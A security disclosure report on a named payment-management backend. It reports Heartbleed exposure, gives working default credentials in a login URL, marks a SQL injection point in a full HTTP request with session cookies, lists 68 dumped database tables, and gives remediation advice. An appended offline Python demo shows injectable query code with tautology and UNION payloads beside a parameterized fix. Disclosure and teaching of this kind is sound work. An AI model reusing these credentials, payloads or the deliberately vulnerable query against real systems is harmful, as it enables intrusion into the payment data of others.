OpenSSL Heartbleed / SQL injection vulnerability in the management backend
As in the title.
Heartbleed vulnerability:
https://gms.gfan.com
Weak passwords:
http://gms.gfan.com:8080/loginAction.do?method=login&password=admin&username=admin (admin/admin)
Duyun/123456
Note that the login action accepts the credentials as GET query parameters, so they also end up in browser history and in proxy and web-server access logs.
Injection:
Injection point: the channelId parameter of messageConsumeDetailClientAction.do (method=findList). The request needs a valid backend session (JSESSIONID), so it is exploitable by anyone holding one of the weak accounts above.

GET /messageConsumeDetailClientAction.do?method=findList&searchModel=1&type=on&beginDate=2016-01-21&endDate=2016-01-28&searchType=3&searchContent=&appKey=0&channelId=[injection point] HTTP/1.1
Host: gms.gfan.com:8080
Proxy-Connection: keep-alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/Safari/537.36
Accept-Encoding: gzip, deflate, sdch
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6
Cookie: pgv_pvid=7868685976; pgv_pvi=3890574959; tma=large; tmd=13.227519179.71033145.1453946820.70.; bfd_g=signature; token=1453966434; Jb1kcwceGvQ="RSl21GK7Bz+signature+0aQJUFHk="; cva4j+xqajE="signature/Signature="; _utma=signature; _utmc=227519179; _utmz=227519179.1453946842.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bytes=1454031169; bytes=1454031169; JSESSIONID=D0548E95C7A3ADA4A1F50AEF61E99E22

Administrator account password:
Database: gfan_pay
[68 tables]
+------------------------------+
| User |
| Action_type |
| Admin_operate_log |
| Admin_user |
| App_info_apk |
| Card_config |
| Channel |
| Charge_log |
| Check_check_info |
| Check_check_status |
| Client_channel |
| Consume_log |
| Contrast_appkey_productid |
| Login_log_20121222 |
| Login_log_tmp |
| Payorder_status_log |
| Rebate_info |
| Recharge_alipay_policy_log |
| Recharge_channel |
| Recharge_channel_account |
| Recharge_dic_channel |
| Recharge_jd_policy_log |
| Recharge_junka_policy_log |
| Recharge_log |
| Recharge_mo9_policy_log |
| Recharge_order |
| Recharge_order_history |
| Recharge_order_operate_log |
| Recharge_order_reb |
| Recharge_request |
| Recharge_submit |
| Recharge_tenpay_policy_log |
| Recharge_uc_recharge_log |
| Recharge_unionpay_policy_log |
| Recharge_unionpay_trade_log |
| Recharge_wechat_policy_log |
| Sdk_app |
| Sdk_message_client_log |
| Sdk_message_pay_log |
| Sdk_pay_log |
| Sdk_pay_point_arrive |
| Sdk_save_ios_order |
| Sdk_sp_dictionary |
| Sdk_sp_sms |
| Sdk_tag_phone_log |
| Sdk_update_log |
| Shenzhoufu |
| Sp_channelinfo_admini |
| Sp_companyinfo_admini |
| Sp_developerinfo_admini |
| Sp_errormessages_log |
| Sp_install_forwardtell_log |
| Sp_partname_admini |
| Sp_pay_forwardtell_log |
| Sp_spcustom_admini |
| Sp_statusreport_log |
| Sp_support_admini |
| Sp_uploadinterface_log |
| Sp_userinfo_admini |
| Sp_version_admini |
| Test |
| Tgr_getcharge_logbyuid |
| Tgr_getconsume_logbyuid |
| Tgr_getsdk_appbyuid |
| Uc_pay_log |
| Uc_uid_imei |
| User_payorder_url |
| Wap_test |
+------------------------------+
Solution:
Upgrade OpenSSL to a release that fixes Heartbleed (CVE-2014-0160, fixed in 1.0.1g). Because the bug leaks server memory, also re-issue the TLS private key and certificate and invalidate existing sessions after the upgrade.
Enforce strong passwords on backend accounts (at minimum change admin/admin and Duyun/123456), and stop accepting login credentials as GET query parameters.
Build SQL statements with parameterized queries (for this Java backend, a JDBC PreparedStatement with bound parameters) so that user-supplied values such as channelId are never parsed as SQL; additionally validate numeric identifiers as integers before they reach the query.
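The following is an added example, not code from the report or from the gfan backend. It reconstructs the shape of a findList-style query with channelId concatenated into the SQL text, shows the boolean-based and UNION-based payloads that such a concatenation admits, and sets the parameterized form from the solution beside it. The column names, sample rows and the query itself are assumptions for the demo; only the table names channel and admin_user and the parameter channelId come from the report. It runs offline against an in-memory SQLite database.

```python
import sqlite3

# Constructed sample data (not from the real gfan_pay database). Only the
# table names "channel"/"admin_user" and the parameter name channelId come
# from the report; column names and rows are assumptions for this demo.
CHANNELS = [
    (1, "official", "2016-01-21"),
    (2, "partner_a", "2016-01-22"),
    (3, "partner_b", "2016-01-25"),
]


def make_db():
    """Build an in-memory SQLite database standing in for gfan_pay."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE channel (id INTEGER, name TEXT, created TEXT)")
    conn.execute("CREATE TABLE admin_user (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO channel VALUES (?, ?, ?)", CHANNELS)
    conn.execute("INSERT INTO admin_user VALUES ('admin', 'admin')")
    return conn


def find_list_vulnerable(conn, begin_date, end_date, channel_id):
    """Hypothetical shape of the findList query: channelId is concatenated
    straight into the SQL text, so whatever the client sends is parsed as SQL."""
    sql = (
        "SELECT id, name FROM channel "
        "WHERE created BETWEEN '%s' AND '%s' AND id = %s"
        % (begin_date, end_date, channel_id)
    )
    return conn.execute(sql).fetchall()


def find_list_fixed(conn, begin_date, end_date, channel_id):
    """Same query with bound parameters: the driver passes the values separately
    from the statement, so they cannot change its structure. channelId is also
    validated as an integer, which rejects every payload used below outright."""
    cid = int(channel_id)  # ValueError for "1 OR 1=1", "0 UNION ...", etc.
    sql = "SELECT id, name FROM channel WHERE created BETWEEN ? AND ? AND id = ?"
    return conn.execute(sql, (begin_date, end_date, cid)).fetchall()


def demo():
    """Run the report's date window against both versions and return the
    row sets so the difference can be checked programmatically."""
    conn = make_db()
    begin, end = "2016-01-21", "2016-01-28"  # beginDate/endDate from the request
    results = {
        "normal": find_list_vulnerable(conn, begin, end, "1"),
        # Boolean-based: a tautology appended to the WHERE clause dumps every channel.
        "tautology": find_list_vulnerable(conn, begin, end, "1 OR 1=1"),
        # UNION-based: admin credentials come back through the channel listing.
        "union": find_list_vulnerable(
            conn, begin, end, "0 UNION SELECT username, password FROM admin_user"
        ),
        "fixed_normal": find_list_fixed(conn, begin, end, "1"),
    }
    try:
        find_list_fixed(conn, begin, end, "1 OR 1=1")
        results["fixed_tautology"] = "accepted"
    except ValueError:
        results["fixed_tautology"] = "rejected"
    return results


if __name__ == "__main__":
    for label, rows in demo().items():
        print(f"{label:16} {rows}")
```

The UNION payload is why the table listing above matters to an attacker: once the column count of the backing query is known, any of the 68 tables (admin_user, recharge_channel_account, and so on) can be read through the same channelId parameter. In the fixed version the integer check is defence in depth; even without it, a bound string is compared as data and never spliced into the statement.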